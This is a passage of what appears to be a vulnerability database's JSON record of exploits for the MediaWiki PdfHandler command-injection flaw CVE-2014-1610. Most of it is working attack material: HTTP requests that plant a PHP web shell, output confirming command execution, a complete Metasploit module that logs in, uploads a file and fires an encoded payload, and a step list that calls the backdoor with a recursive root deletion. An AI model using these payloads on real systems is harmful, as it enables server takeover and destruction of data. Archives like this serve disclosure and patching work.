
\n \n# Proof-Of-Concept \n#################################################################### \nGET \n/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php` \nHTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiUserID=2; my_wikiUserName=Longcat; \nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02 \n \n<html><head><title>Error generating thumbnail</title></head> \n<body> \n<h1>Error generating thumbnail</h1> \n<p> \n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br /> \nconvert: option requires an argument `-resize' @ \nerror/convert.c/ConvertImageCommand/2380.<br /> \nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> \n \n</p> \n \n</body> \n</html> \n \n \nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; \nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 \n \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \n \n \n# Back-end $cmd \n#################################################################### \nGlobalFunctions.php : wfShellExec() \ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 \n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | \n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php \nsystem(\\\\$_GET[1]);\">images/longcat.php` - \n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125040/mediawiki1221-exec.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-05T03:27:22", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "zdt", "title": "MediaWiki Thumb.php Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-20T00:00:00", "id": "1337DAY-ID-21922", "href": "https://0day.today/exploit/description/21922", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell 
metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n \r\n def get_version(body)\r\n meta_generator = 
get_html_value(body, 'meta', 'generator', 'content')\r\n \r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n \r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n \r\n return major, minor, patch\r\n end\r\n \r\n return nil, nil, nil\r\n end\r\n \r\n def check\r\n uri = target_uri.path\r\n \r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n \r\n response = send_request_cgi!(opts)\r\n \r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n \r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n \r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n \r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n \r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n uri = target_uri.path\r\n \r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 
'Special:UserLogin' }\r\n })\r\n \r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n \r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n \r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n \r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n \r\n session_cookie = response.get_cookies\r\n \r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n \r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. 
Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n \r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n \r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n \r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n \r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n \r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n \r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n \r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. 
Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n \r\n upload_mime = Rex::MIME::Message.new\r\n \r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n \r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = upload_mime.to_s\r\n \r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n \r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 
'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n \r\n payload_request(uri, file_name, my_platform)\r\n end\r\n \r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n \r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n \r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n \r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n \r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n \r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n \r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n \r\n ''\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/21922", "cvss": {"score": 6.0, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T11:12:53", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21845", "href": "https://0day.today/exploit/description/21845", "sourceData": "####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n \r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. 
happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. 
/extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: 
Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21845", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T05:24:21", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21844", "href": "https://0day.today/exploit/description/21844", "sourceData": "# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. 
inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? 
...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? 
...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' 
|\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/21844", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMediaWiki 1.22.1 PdfHandler - Remote Code Execution", "edition": 2, "cvss3": {}, "published": "2014-02-01T00:00:00", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, 
